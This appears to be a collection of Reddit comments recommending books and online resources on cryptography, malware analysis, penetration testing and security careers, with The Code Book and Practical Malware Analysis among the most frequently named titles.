O'Reilly is a reliable publisher of quality tech books. An amazon search for "O'Reilly networking" pull up a bunch. Also, their "in a nutshell" series of books are great reference books for Windows, Linux, Networking, etc... You can probably find older/used copies online for a decent price (check ebay and half.com too)
> How would you recommend learning about encryption? I just subscribed to /r/crypto so I can lurk there. Again, can you point me at some books?
Try "The Code Book" for a very accessible intro to crypto from ancient times thru today
http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323
Also, for basics of computer architecture, read "CODE", which is absolutely excellent and shows how computers work from the ground up in VERY accessible writing.
http://www.amazon.com/Code-Language-Computer-Hardware-Software/dp/0735611319
Reverse Code Engineering. Down the rabbit hole you go!
I'm not sure how to tell you where to start with cryptography. For the kind of stuff they've been doing so far in the footers, it's enough to just understand binary numbering. The rest is mostly intuition.
The Caesar cipher is an example of a shift cipher, which in turn is a subset of the broader category of substitution ciphers. You should probably familiarize yourself with how to use frequency analysis to break classic substitution ciphers. The next major evolution of ciphers was the vigenere cipher. During WWI, Germany used the ADFGVX. Even now, breaking it is not trivial if the key is sufficiently long.
On the modern, digital side of things, encryption algorithms generally fall into two categories: block ciphers (ex. AES, DES, Blowfish, etc.) and stream ciphers. You should probably learn what hashing algorithms are (ex. MD5, SHA-1). If you want to crack hashes these days, you'll want to know about rainbow tables.
If you're looking for a good laymen's introduction, I recommend The Code Book by Simon Singh.
Though strictly factual, Simon Singh's The Code Book can at best of times be read as a good spy novel, just based on real historical facts. A very interesting read nonetheless!
Malware Analysis and Pentesting are 2 somewhat different fields of practice, though they do have overlapping education and tactics.
For Pentesting I can't point you to a better framework than Vuln. Assesments. That will give you the step by step methodology to a pentest with listing of the tools you can use for each step. As I said towards the end of my initial post, I am not a huge fan of what most people call "pentesting" these days as it's turned into basically automated vulnerability scanning (Nessus, OpenVAS, etc) and then the use of canned exploits through Metasploit and similar toolsets. I just don't understand the appeal of that myself and because of that I can't really answer this question very thoroughly (though there are plenty here who can).
Now Malware Analysis is something I can talk about; it is where most of my fascination and passion resides. I would follow the "curriculum" I laid out above since most of that pertains to Reverse Engineering which is the crux of Malware Analysis. The only change I would make is to learn Assembly right after C and then after you're comfortable with C, write a few of your own programs and disassemble them yourself in conjuction with learning Assembly through this course which I already linked above in my original "curriculum" post. It wouldn;t hurt to also use this page to guide you as well.
As far as books specific to Malware Analysis, the standard seems to be Practical Malware Analysis and Malware Analyst Cookbook. Both of those are great books, the former has some fun labs for both beginners and advanced analysts to gain knowledge from. However, with that being said, malware is such a dynamic landscape, the constantly growing and unstable nature of this type of work means you have to be up to date at all times. The malware authors and threat actors are becoming more and more effective and creative, not to mention those which are well funded and persistent know usually as the dreaded "APT", adapt new TTP's daily and the methods used to evade our disassembling, escape VM's, cover up tracks, divert your attention, etc, etc.
A book was recently released on Stuxnet, discussing the event and what it could mean for the future: Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter.
I haven't gotten to it yet but it's received excellent reviews from just about everyone.
Read this.
Also if you find a flash drive on the ground somewhere, don't claim it as your own. It's not like finding candy on the ground (that stuff is usually fine).
I'd like to preface this by saying that I am certainly not the world's greatest security expert and that there are many people who are more qualified to speak to this matter. Hopefully some of them will see your post and chime in.
In my experience the less complex the product is, the easier it is to both maintain and secure. Therefore, knowing what you're building and how to build it gives you much better control over the security of it. Unless you're apart of an extremely tight-knit team that includes your SysOps and DevOps people or you're developing the product and the product's host environment by yourself, then there will always be aspects of security outside of your control. However, putting time and effort into the security of the product itself is typically a rewarding investment.
Books:
This book is focused on introducing security considerations into the phases of the SDLC. The information in this book is a bit more advanced than Security Software (included below) but not inaccessible to a beginner. Understanding architectural risk analysis is a valuable skill in any tech environment.
I would say this book is a must-have if you develop any sort of Java web app or API. The authors manage to cover a lot of territory in a very understandable format.
Another book that is primarily aimed at introducing security into each phase of the SDLC. When I first started working in software development I found it extremely helpful at convincing some "old guard" types why red teaming products is extremely valuable. You may want to read this before reading Threat Modeling.
Networking is definitely not my strongest skill but this book breaks down some concepts of network monitoring and threat detection in ways that are easy to understand.
Really great book: https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998/ref=sr_1_1?ie=UTF8&amp;qid=1506015037&amp;sr=8-1&amp;keywords=threat+modeling
Applied Cryptography by Bruce Schneier.
Yes it's older, but it will get you up to speed with the concepts.
I think the book really is the gold standard when it comes to introducing cryptography. I read it cover-to-cover in 1999 and it really explains everything well. I used encryption software before that, but this explains how it all works.
You mention a diverse set of topics, and you're probably not going to find any one book that covers all of them.
For algorithms for cryptography, signatures, protocols, etc. the definitive go to (last I checked) was still Schneier's Applied Cryptography.
For a history of cryptography, I'm fond of Kahn's The Codebreakers, but be forewarned that it is a large book.
For Network Security and Information Assurance concepts, I like Anderson's Security Engineering, but the state of the art changes so rapidly that it's difficult to recommend a book.
I would stay away from dual booting. It's just a pain in the ass. Install Windows and virtualize (VMware Player/VirtualBox) the Linux environment. If you go with VirtualBox or a pro version of VMware, you have the added benefit of being able to snapshot your environment, muck it up, and roll back to that snapshot.
I use books more for reference than to read through. With that in mind, the single most useful book I own is this: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
I highly recommend this for anyone in netsec: http://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756
> This topic really needs a full book treatment to do well. Unfortunately like most security topics there just aren’t any great books to point to that I know of.
What about the Blue Team Field Manual?
If you are referring to security in general, I don't think there will ever be? Our field fluctuates way to much. The moment we get something on paper, its already outdated.
Great episode!
If anybody is interested in the history of cryptography and how it works, I suggest checking out "The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography" (Amazon link).
Although I haven't finished the book yet, I've found it very interesting so far. A good chunk of the book talks about cryptography in WWI and WWII, which I found pretty interesting. The Zimmerman telegram mentioned in this video is included in the book I believe.
GIAC GSE here and I had successfully pass 4-5 GIAC certification via self-study. I can relate your situation completely since I am exactly in the same situation as you 8 years ago.
&#x200B;
Google up the course authors and buy their Amazon books. Countermeasure Art Active Defense is by John Strand and a course author/instructor for GCIH. The content may be different by underlying concepts is always the same. Buy those books that are written by people who had an affiliation with SANS in a way or another.
&#x200B;
If books by SANS affiliated authors are not available, then get those books with high reviews that are related to the topic you are studying for.
&#x200B;
https://www.amazon.com/Offensive-Countermeasures-Art-Active-Defense-ebook/dp/B00DQSQ7QY
https://www.amazon.com/gp/product/B01M3USWQ2/ref=dbs_a_def_rwt_bibl_vppi_i2
https://www.amazon.com/Cybersecurity-Incident-Response-Eradicate-Incidents/dp/1484238699
&#x200B;
Once you are done with the books, indexed them and buy a practice test to test the book's contents against the exam. Google up any information that the books don't cover and print them out. If you can pass the practice test with those books, then you will do well to pass the exams with those books + google printouts on the actual exams.
Cyberwar by Richard Clarke is a good read to get your feet wet.
http://www.amazon.com/gp/aw/d/0061962244/ref=pd_aw_sims_1?pi=SY115&amp;simLd=1
http://www.amazon.co.uk/Everyday-Cryptography-Fundamental-Principles-Applications/dp/0199695598
I've only just become interested in cryptography, thanks to all the NSA "news" I guess. So far, I'm really enjoying the book: Everyday Cryptography by Keith M. Martin!.
It is a nice intro, full of references and further reading and even has exercises to help you really understand the subject. It is light on math, so not for serious crypto-freaks I guess.
If you want an interesting history of cyptography, read Simon Singh's The Code Book
You can write perfect encryption by hand using a One Time Pad. It requires exactly zero high level mathmatics. The reason it isn't used as often as other encryption methods is that it requires an exchange of keys each time it is used.
The Code Book by Simon Singh has a nice section on the Enigma machine and at least some of how it was cracked. It's a little simplified but not significantly*. I took a course years ago that went really in depth on cracking Enigma by hand, and it used Singh's book as the main textbook for that part with a lot of additional handouts that I don't have any more.
* Different branches of the gov't and military had different Enigmas, and some really were more complicated and way harder to crack. The "standard" army one is basically like Singh describes, although he assumes that the inner wirings of the rotors are known. In fact Rejewski had to figure that out too, and though that also used cycle structures, it's much more technical.
Start here:
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
For a thriller treatment of infections diseases, the following are a nice read
I'm inclined to also suggest the works of Simon Singh, to whom I was introduced by his book on math and cryptography - The Code Book. But he has also written about cosmology and "alternative" medicine. The later got him involved in a landmark libel lawsuit in the UK. For that reason, there is probably more than the usual bit of politics you'd expect in a popular science book. However, in the post-truth era of Donald Trump and company, that maybe fitting if bitter medicine.
Edit: As someone who may not have the best scientific background, one might be prone to confuse science with pseudoscience. Even today, there is no shortage of low quality literature on UFOs and parapsychology. As such, Carl Sagan's The Demon Haunted World: Science as a Candle in the Dark is highly recommended.
I don't think either of these will help you become good at problem solving except on a very high conceptual level. Traditional games like those you mention are the inverse of programming. In traditional games you have a fixed measure of success, fixed legal moves, and a finite number of states. In programming you have a nebulous measure of success, an infinite number of things you can solve and an infinite number of states.
If you want to study games, look at them from a high level. What makes them the same? What makes them different? Are there strategies that transcend single games and apply to many?
You can also look for problems that are more open or look deeper into everyday things. Math proofs are a good example, think back to geometry and try to construct simple but sound proofs on your own. Try some problems on Project Euler. Read The Code Book and try to break some ciphers. Look at the objects you come across every day, ask yourself "why does this work the way it does?" and think through all the ramifications (here's one: why do stairwells have a swinging door on the first floor?) Look at the processes you have day to day, how could they be improved? How would you improve them?
I really recommend The Code Book by Simon Singh. Not only is it an amazing history of ciphers and codebreaking, but he gives a LOT of examples and practice material. There's some more challenges on his web site as well.
Depending on age, The Code Book is a very approachable history and introduction to cryptography.
The Code Book. Very entertaining, too.
You might want to check out this guy and his book aptly named the Code Book. I can't speak for it's authenticity and how accurate all the information is, being just an amateur, but it is quite interesting and gave me a nice overview of different secret message writing techniques. Worth a read.
If you like books and are interested in modern cryptography, "Serious Cryptography" was excellent. A more introductory text with historical context is "The Code Book".
I enjoyed Big Bang very much. I have also been recommended here another book by the same author: The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography
Some search terms for how the internet works: Packet switched networking, TCP, IP, SSL.
I don't think I have ever read a book about basic internet workings, the internet is really the best place to read about that stuff (hence the search terms).
Instead I will list some books which look at how we define security and why secure systems fail:
Secrets and Lies is a good primer discussing trust / networks / cryptography and a few other things at a high enough level to be interesting to a lay reader: http://www.amazon.com/Secrets-Lies-Digital-Security-Networked/dp/0471453803/ref=sr_1_4?ie=UTF8&amp;qid=1419753343&amp;sr=8-4
Art of Intrusion is packed full of stories about how systems (computers or otherwise) fail and become insecure: http://www.amazon.com/Art-Intrusion-Exploits-Intruders-Deceivers/dp/0471782661/ref=sr_1_1?ie=UTF8&amp;qid=1419753466&amp;sr=8-1 the sister book Art of Deception (stories about Social Engineering) is also pretty good.
The Code Book, mostly history, but provides a great introduction to cryptographic concepts. http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323/ref=pd_rhf_se_s_cp_7_RTJS?ie=UTF8&amp;refRID=1RRWWY0RNX7G8HRYPFFS
Hi I'm not sure if these are the books you would enjoy, but I do have a couple of them in my pocket list:
Personally in recent years I'm interested in topics about algorithms/cryptology and economics, so The Code Book by Simon Singh, Fortune's Formula: The Untold Story of the Scientific Betting System That Beat the Casinos and Wall Street by William Poundstone, The Physics of Wall Street: A Brief History of Predicting the Unpredictable by James Owen Weatherall, these are the ones of my all time favorite "history" books about math and science and their applications. : )
I can still come up with another (popular) book, Freakonomics: A Rogue Economist Explores the Hidden Side of Everything, but I didn't really enjoy the book, guess I didn't agree some of the conclusions in that book. But maybe you would find it interesting. :)
Hope this helps! ☺️
There are two basic types:
If you want to enjoy reading about encryption. checkout the book by Simon Singh: The Code Book
The Code Book was really good as well!
As soon as I looked at the image, the first thing that popped into my head was:
"Really useful chart to use against simple ciphers"
Have you read "The Code Book" [1]? Fantastic read :)
[1] https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/
http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323
The Code Book is exactly what you are looking for. Very fun read, very informative.
Somebody told me, so I'm telling you: The Code Book is where it's at. Very easy to read and understand and will answer your questions.
Off the top of my head:
The Psychopath Test is a wittily written personal study of detecting, treating and (possibly) rehabilitating psychopaths.
The Freakonomics books are written by both an economist and a journalist (so easy to read) and contain slightly left-of-centre economic theories with easy to follow research. These are excellent.
The Omnivores Dilemma is both engaging and though provoking. It's All about the production of food in the modern age. In particular, four different meals.
The Code Book is one of my all-time favourites. As the title suggests it's about all forms of cryptography. If you have a mathematical bent I also like Singh's book about Fermat's Enigma).
I'm also a big fan of Simon Singh's The Code Book because he included ten encoded messages at the end offering a prize to the first person to break them. It took over a year from the book's release for someone to solve them.
There's an interesting book about encryption that I read a few years ago that discusses exactly this. [The Code Book by Simon Singh] (http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323).
Anyone interested in encryption and how it has evolved should read this book. bobcobb42 is absolutely right, some of the modern encryption techniques such as RSA are near impossible to break if applied correctly. In RSA two very large (the larger the better) prime numbers are multiplied to encrypt data. As long as the prime numbers used to encrypt the data are kept secret then the process of finding those number and reversing the encryption would take many many powerful computers working many many years to break. The reason for this is because to find the original prime numbers that were multiplied to get they key very large numbers would have to be factored, which is very hard to do since their is currently no algorithm that is known to do this.
IIRC the government actually gave the inventors of RSA or Diffie-Hellman, one of the two, a really hard time over their encryption because they couldn't break it so they didn't want it public.
I quite enjoyed The Code Book by Simon Singh. It's a book on cryptography for the layman. Not really about computer science, per se, but it's fascinating and explains a lot about thinking algorithmically.
The Code Book by Simon Singh is a nice, informal introduction to cryptography including modern day cryptography.
ah, yeah they're sorta the same thing.
Two other ideas, if he's into books, If Hemingway Wrote Javascript is an awesome one -- he pairs up like, 100 famous authors with programming languages and writes programs as if he were the author.
Also, The Code Book is really cool too. A really interesting and in depth history of encryption.
The beginning of this video has a good explanation of how public/private key cryptography works, using the analogy of paint colors to show how one way functions make encryption like this possible. The math part is a little rushed, but the first half is a great visual aide.
I recommend reading The Code Book by Simon Singh if you're interested in the history of cryptography in general. The sections on the Enigma machine are fascinating.
RSA and public key cryptography in general are fascinating ideas, and do have tremendous applications to "real life". For an extremely approachable/readable book about cryptography I highly recommend Simon Singh's "The Code Book". It doesn't delve very deep into the technical mathematics of cryptography, but it does do a great job of understanding the basic evolution of codes. ciphers, and cryptography. I wrote my high school IB extended essay on the history of RSA and public key cryptography, and this book was a great source. Again, you would probably get better recommendations for topics if you specified your current grade/level.
Okay so there are a couple of good places to start with malware. The first is Malware Analyst's Cookbook. It is a pretty decent beginner level resource.
From there, Practical Malware Analysis is excellent and goes a lot deeper.
For free resources I've heard good things about Dr. Fu's Malware Analysis Tutorials.
You will need to have a strong understanding of reverse engineering. I like Practical Reverse Engineering or Reverse Engineering for Beginners. The latter is free.
With RE comes assembly. I learned from the free book PC Assembly Language. The RE books should have some info on assembly as well.
You should also know the systems programming API and OS internals for whatever OS you're interested in. This is most likely Windows, so I recommend Windows System Programming and Windows Internals. You can find similar books for Linux and macOS too. Having a good understanding of C and C++ is helpful for this. Also get comfortable using your assembly level debugger on your OS of choice. WinDBG, x64dbg, and OllyDBG are all good on Windows. GDB is pretty much the default on Linux, and LLDB on macOS.
I also highly recommend some scripting language, whether it's Python, Ruby, Powershell or whatever for hacking up your own tools.
Lastly, there is a list on GitHub with a ton of helpful links.
I think that's enough for now.
As far as demand it's hard to say and probably depends a lot on where you're from. It's certainly not like the demand for webdevs but there's also not nearly as many people with the skillset. I'm not a malware analyst myself, I'm more focused on security research and embedded development.
I know those skills are especially high in demand around the Washington, DC area with defense contractors and government agencies. Especially if you can get a security clearance. Most other security firms I know of are always looking for good people with strong reversing and OS internals knowledge.
Let me know if you have any questions and I will try to answer.
>Examples of projects I have completed: Coded a basic Linux kernel from the ground up for x86 machines, Working on a basic IRC botnet coded in Python, I have experience in Snort rules and have written Python scripts for log parsing. I have used Wire shark for packet sniffing etc, experience in using IDA for disassembling code for CTFs.
Why on earth would you pursue Sec+ and CISSP if you have experience in those things?
Build a Malware Lab, dude. Check out Practical Malware Analysis and The Art of Memory Forensics. With your experience you could probably wreck those over the summer.
If you want an old school, but relevant (more Red Teamer), you could check out Hacking: The Art of Exploitation and The Shellcoder's Handbook.
Practical Malware Analysis
The Art of Memory Forensics
Hacking
Shellcoder's Handbook
Malware Analyst's Cookbook
Sure thing! I don't do a whole lot of Malware RE, but where I started was with the book:
Of course, knowing assembly is very valuable for Malware Analysis as well, so it would be useful to still know most, if not all, of the stuff I listed in the other comment.
Other good places to start would be:
Definitely would start with the book, Practical Malware Analysis and get your feet wet a little bit. Then browse through the other stuff or if you're a visual person, watch some videos on youtube of how other people dissect Malware, just so you can see the bigger picture.
Hope that helps!
There are a ton of different things you can do on the defensive side. The path here is a bit less defined because you can specialize in each of these areas with out ever really touching the other ones. But I think these are the most important skills as a defender, so I’ll break it up into three smaller chunks. For the most part, defender/Blue-team concepts draw from these skills, I’ve setup the courses in order, as some of these skills may feed into other areas.
IR:
Forensics:
Reverse Engineering (Dynamic and Static):
I know there’s not a lot of certs here, and unfortunately, that’s how it is across the blue team. Certs here are usually very vendor-specific, and not applicable to defense as a whole. Those certifications exist, but I’m not listing them here.
If people are interested, I can also do a similar write-up on Mobile Forensics and Cloud Forensics (which is my direct background).
Lastly, here are some of my favorite news sources across the InfoSec community -
News Sources
Add a Malware Analysis section to books and punch in Malware Analyst's Cookbook. ;)
http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033
I would also add in OS hardening some where and link to NSA's guides:
http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml
I don't know if there exist threat modeling for a single person but usually most of the materials online are at enterprise level or something to that level. Like those of certification materials Security+ and CEH v9 or other similar courses. It can somewhat give you an idea how you want to determine your threat model.
For courses, I like Nathan House's stuff from Udemy.
There are as well books that cover those topics but the pages can range around 200 to over 600 of pages. E.g. The Basics of Cyber Safety has 254 pages and Threat Modeling: Designing for Security has 624 pages.
You can check those also:
https://en.wikipedia.org/wiki/Threat_model
https://en.wikipedia.org/wiki/Threat_%28computer%29#Threat_model
Otherwise see conferences like DEF CON, Black Hat, CCC and similar topics. Here's my give away:
I hope that helps.
Everything you ever wanted to know about cryptography (but not necessarily all cryptographic algorithms) is in Practical Cryptography. If that doesn't fill your cup, then put on your big-boy pants and dive into Applied Cryptography. You will note that Brian Schneier is a common author between those two books. There is a reason for that. :-)
Yeah just don't buy it unless you really want to do and explore a lot of C programming. That said it was great for my systems programming class as a sort of reference. But as for attack/defense start looking into networking if you aren't familiar with it, and if you are network security then, of course, there is actual information security, what most people mean by crypto even though there is a lot more to it. For crypto, I'd recommend This but that's more an overview of what your crypto algorithms actually do.
The cryptography course is the one I'm really excited about. I read the red book when I was like 19, and I've been waiting for that course ever since.
>wrong methodology.
Correct methodology is to break shit. Ignore the rules and bend them.
Just pay attention to what is in scope. Dont take down a production server etc. Dont snoop 3rd party hosted sites.
>doing in my free time
Do what ever interests you.
===
books:
Hack playbook
http://thehackerplaybook.com/dashboard/
Red team field manual.
https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
>participate in bug bounties
Dafuq?
Yes, most Gov jobs require at least Sec+.
Depending on how much you did as an LEO you may look into computer forensics. Network Security etc. You may also want to beef up knowledge of networking as well. So either the Net+ and/or CCNE cert.
Books are always a good place to start. I don't know about this one but have read a few other books by this publisher that have been pretty good.
Ones I have read/skimmed:
Haven't picked this one up myself, but it has good reviews
I'd be very surprised if you haven't heard or got these given your certs! Either way highly recommend the Blue Team Field Manual and Red Team Field Manual
Sorry this has taken me so long to get too. Been busy.
First, understand that Kali is nothing mote than a collection of tools. Its those tools that you are actually wanting to learn.
KaliTutorials is one place you can start.
Also, there is an abundance of videos on YouTube and if you are serious about wanting to learn penetration testing/security makes sure you book mark Irongeek
Like I said earlier, by the time books are written, edited, and published, they can often be out of date.
If you do want to understand some of the basics, here are books you should look at:
Metasploit: The Penetration Tester's Guide
rtfm
btfm
Basic Security Testing with Kali Linux 2 I havent read this one but I have heard good things
The Hacker Playbook
[The Hacker Playbook 2] (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566/ref=pd_sim_14_4?_encoding=UTF8&amp;pd_rd_i=1512214566&amp;pd_rd_r=2HDYK8BDM5MR8PV03JG8&amp;pd_rd_w=kiAl7&amp;pd_rd_wg=fAjYi&amp;psc=1&amp;refRID=2HDYK8BDM5MR8PV03JG8)
Also a good list of resources can be found here: cybrary.it
I have RTFM in my bag, but more for the joke than anything. In reality, it has a lot of good stuff in it, across the board.
http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
I usually bookmark a bunch of stuff, but end up re-googling anyway because it's faster than traversing my bookmarks.
The books mentioned in your other thread and by /u/dreddriver are good and I would like to add RTFM and Malware Analysis: Investigating and Analyzing Malicious Code. The latter is a little dated but still relevant as far as live memory analysis goes, which is the bees knees in modern forensics.
Make sure to ISOLATE and SANDBOX. Download Metasploitable and Ultimate Lamp.
This is a good guide--
https://community.rapid7.com/docs/DOC-2196
and this
http://resources.infosecinstitute.com/hacking-lab/
Keep up to date on CVE's
And as always, follow security guys on their blogs, Twitter, and whatever. People are super crafty and always coming up with new ideas.
>But basically after that I have to decide soon whether or not to focus on a Cisco, or Microsoft track at my college.
Sounds like your "college" is a joke. You should be learning the fundamentals that are responsible for the underpinnings of these technologies, not vendor recommendations that can easily almost be called propaganda. Especially at your beginner level, you wouldn't even touch technologies as part of your responsibility at the level taught by an MCSE or CCNA unless you work for an absolute moron.
The world is larger than Cisco and Microsoft. I suggest you look for actual academic books on Networking and Server Architecture to learn more useful things.
Computer Networking: A Top-Down Approach (6th Edition) https://www.amazon.com/dp/0132856204/ref=cm_sw_r_cp_awd_4Ev3wbE0EVGDH
Understanding and Deploying LDAP Directory Services, 2nd Edition https://www.amazon.com/dp/0672323168/ref=cm_sw_r_cp_awd_KFv3wbW3QNAGF
For future tracks:
Databases:
SQL Queries for Mere Mortals: A Hands-On Guide to Data Manipulation in SQL (3rd Edition) https://www.amazon.com/dp/0321992474/ref=cm_sw_r_cp_awd_SGv3wbGCZ24FA
Fundamentals of Database Systems (7th Edition) https://www.amazon.com/dp/0133970779/ref=cm_sw_r_cp_awd_qHv3wb1YC95NS
Security:
Computer Security: Principles and Practice (3rd Edition) https://www.amazon.com/dp/0133773922/ref=cm_sw_r_cp_awd_ZHv3wb7J1YJKC
Blue Team Handbook: Incident Response Edition: A condensed field guide for the Cyber Security Incident Responder. https://www.amazon.com/dp/1500734756/ref=cm_sw_r_cp_awd_uIv3wbK1361D2
Hardware:
Upgrading and Repairing PCs (22nd Edition) https://www.amazon.com/dp/0789756102/ref=cm_sw_r_cp_awd_gJv3wbCKGA502
Problem Solving:
The Thinker's Toolkit: 14 Powerful Techniques for Problem Solving https://www.amazon.com/dp/0812928083/ref=cm_sw_r_cp_awd_XKv3wbKQFJK6Q
Best of luck. I recommend learning Shell languages and the basics of shell navigation and data manipulation techniques for various operating systems as well.
http://www.amazon.com/Blue-Team-Handbook-condensed-Responder/dp/1500734756
It looks like you're moreso interested in blue team work. To tell you the truth, I'm more on the offensive side of things, but I'm sure I can still provide some help here. From what I can tell, it seems as though you already have a pretty solid base to work from based on the area you're looking at. Professor Messer provides some high quality videos that would serve as useful to you, as you would need to be pretty well rounded (although not quite expected to master all of these things) to get an infosec position. The network+ and security+ videos may be more useful in this context, but feel free to disregard the topics you know strongly and pursue the ones you're interested in. CompTIA also has the CSA+ which has a heavy focus on analyst concepts. While having certifications aren't a bad thing at all, it's not always necessary if you have the equivalent knowledge (I'd do a few job searches, and build out a "learning syllabus" from there, based on the responsibilities and requirements).
Speaking of which, in your case I would look for related entry level positions. I'm not quite sure where you are in terms of experience via internships / jobs, but assuming you didn't have infosec / IT experience yet, I would look into tier 1 SOC/NOC positions as I would imagine that it would provide the most carryover, considering your skillset and interests.
A few extra resources:
https://www.linkedin.com/pulse/breaking-cybersecurity-field-derek-carlin - Pretty solid career roadmap
https://www.cybrary.it/ - Several free courses, much higher quality than many of the udemy options (Also, don't worry about any of their certifications, they're not of high value compared to the knowledge you gain)
https://www.vulnhub.com/faq/#ptestnext - The most competent defenders that I've known, usually had a basic understanding of the offensive side of things as well. I noticed that you've done some offsec work during your courses, so this would be a good way to cultivate those skills a bit.
https://www.youtube.com/playlist?list=PLtGnc4I6s8dssa8hF4yMTAa4BrSJCSwux - Linux: again, just to show that you're well rounded
https://www.amazon.com/Blue-Team-Field-Manual-BTFM/dp/154101636X - BTFM: A pretty solid usage of 15ish dollars in your situation
Also, almost forgot to mention that the sidebar on here, and /r/netsec has a pretty solid list of resources.
Best of luck, and feel free to message me if you have any more questions, or need clarification on anything.
This is the book I was talking about before. America the Vulnerable: Inside the New Threat Matrix of Digital Espionage, Crime, and Warfare.
You should check it out, it's very informative yet scary at the same time. It was written by Joel Brenner who wasn't the DCI for the CIA (I was mistaken in my original comment), he was the "inspector general of the National Security Agency, then as the head of counterintelligence for the director of national intelligence."
>then it will only be a matter of time before stuxnet, duqu, flame et al are reverse-engineered and deployed against American interests.
It's been a while since I listened to the audio book of it but I believe this was a major concern of his.
There's so much we don't know. Something gleamed from the book was that the US was the first to major player in hacking other countries. Today China ranks number one in hacking attempts on other countries but in the 80's and 90's America was number one. Cyber weapons like Stuxnet might as well be as powerful as nuclear arms. China has definitely penetrated our power grid and other crucial systems. However, if China ever did launch an attack the US Cyber Command (USCYBERCOM) would retaliate.
The mission statement of CyberCom:
>According to the US Department of Defense, USCYBERCOM "plans, coordinates, integrates, synchronizes and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries."
We are probably in their systems too, just like they are in ours. It's the nuclear arms race all over again. All the major powers have nukes...who's going to be the first to use them? Who's going to pull the trigger first?
It's probably better that most people don't know that we are living a few mouse clicks and keystrokes away from being sent back to the stone-age.
This is probably the book by John Strand you mentioned: Offensive Countermeasures
I can't speak on creating a dirty network. But Advanced Malware Analysis or The Malware Analysts Cookbook
Is there an English translation of Codes? I can only seem to find German versions.
I really enjoyed The Code Book by Singh (it's basically a history of cryptography).
Here is the explanation that stuck with me. It's from a mathematician here on Reddit and it made /r/bestof a year ago: https://www.reddit.com/r/math/comments/3tn1xq/what_intuitively_obvious_mathematical_statements/cx7np4t/
Also, check out The Code Book by Simon Singh for a fascinating history of how encryption got to where we are today, and where we are going.
You can try Cuckoo's Egg: http://www.amazon.com/The-Cuckoos-Egg-Tracking-Espionage/dp/1416507787
And if you like it, here's the movie about the book: http://youtu.be/EcKxaq1FTac
It's one of my favorite books of all time.
If you haven't read Mitnick's other work, he has the Art of Intrusion which is pretty nice.
Fatal System Error is also a nice read: http://www.amazon.com/Fatal-System-Error-Bringing-Internet/dp/B004NSVENM
If you're into fiction, read this: http://www.amazon.com/Zero-Day-Jeff-Aiken-Novel/dp/1250007305/
I just started to get back into reading. I've been picking up books from airports and end up getting hooked on them.
Extreme Risk: A Life Fighting the Bombmakers was a really good read http://www.amazon.com/Extreme-Risk-Life-Fighting-Bombmakers/dp/0552157597/ref=sr_1_1?ie=UTF8&amp;qid=1300672302&amp;sr=8-1
I'm now reading Fatal System Error which has been equally addictive http://www.amazon.com/Fatal-System-Error-Bringing-Internet/dp/B004NSVENM/ref=sr_1_1?ie=UTF8&amp;qid=1300672448&amp;sr=8-1
Both are non-fiction.
Try John Strand
https://cyber-defense.sans.org/blog/2015/06/01/what-you-need-to-know-about-active-defense-and-threat-intelligence
And his book
https://www.amazon.com.au/Offensive-Countermeasures-Art-Active-Defense-ebook/dp/B00DQSQ7QY
I don't know if you've read it but if you're interested, Cyber War by Richard A. Clark is a good read.
> Those aren't connected to the internet.
If you want something nice to read: http://www.amazon.com/exec/obidos/ASIN/0061962236 (Cyber War by
Richard A. Clarke )
bots get everyday a little more evolved and get a little more of our jobs - https://www.youtube.com/watch?v=7Pq-S557XQU - which brings serious societal tensions ...
but the part in-explored there is pirating the operating systems and apps -> imagine to drive on a high-way an "intelligent" car with pirated GPS and self-driving SW already TODAY ^^
with more bots everywhere, such attacks open new horizons for criminals, but certainly new wars - better then nukes - and we are already in such wars https://www.amazon.com/Cyber-War-Threat-National-Security/dp/0061962244
http://www.amazon.com/Cyber-War-Threat-National-Security/dp/0061962244/ref=sr_1_1?ie=UTF8&amp;qid=1377714175&amp;sr=8-1&amp;keywords=Cyberwar
This is the book I read it in.
I found this book quite useful for explaining crypto and its practical applications in your everyday life.
I am a self-taught security guy so I was familiar with how things worked but this book really explained how they worked scientifically which I found awesome.
Edit:
Fixed link.
Don't know if anyone will see this now that it's Tuesday, but I'm looking for a recommendation for a book on the history of cryptography. Right now I've found The Codebreakers (expensive) and The Code Book. Does anyone have any experience with these books, or in the subject generally that can offer other suggestions? Thanks a ton.
No problem. I am a crypto nut. I love talking about this stuff! If you'd like to learn more about cryptography, then you should add this book to your wishlist and pray someone gets it for you! It follows the history of cryptography from its infancy to its present state of being and goes on to speculate about the nature of cryptography in the future. It's one of my all time favorite books!
What's the difference between this one and this one?
The Code Book by Simon Singh
This book is amazing...it started my love of cryptography and secrets....and taught me how behind the scenes these things have been shaping history in ways we don't always see.
If you want to know more about how Turing cracked the Enigma Machine, i suggest to read this really nice book :
http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
Check out The Code Book by Simon Singh. It is about the history of cryptography, but along the way, it also has some history of computing, and it's an entertaining read.
Imagine someone wants to send you a package and they want to lock it with a padlock. They could put the lock on the box and send it to you and then somehow they have to get you the key. They could send it separately or through some other secret means, but there is always the possibility that the key could be intercepted and copied. This method is secure but only if you can securely transmit the key. This is basically symmetric encryption.
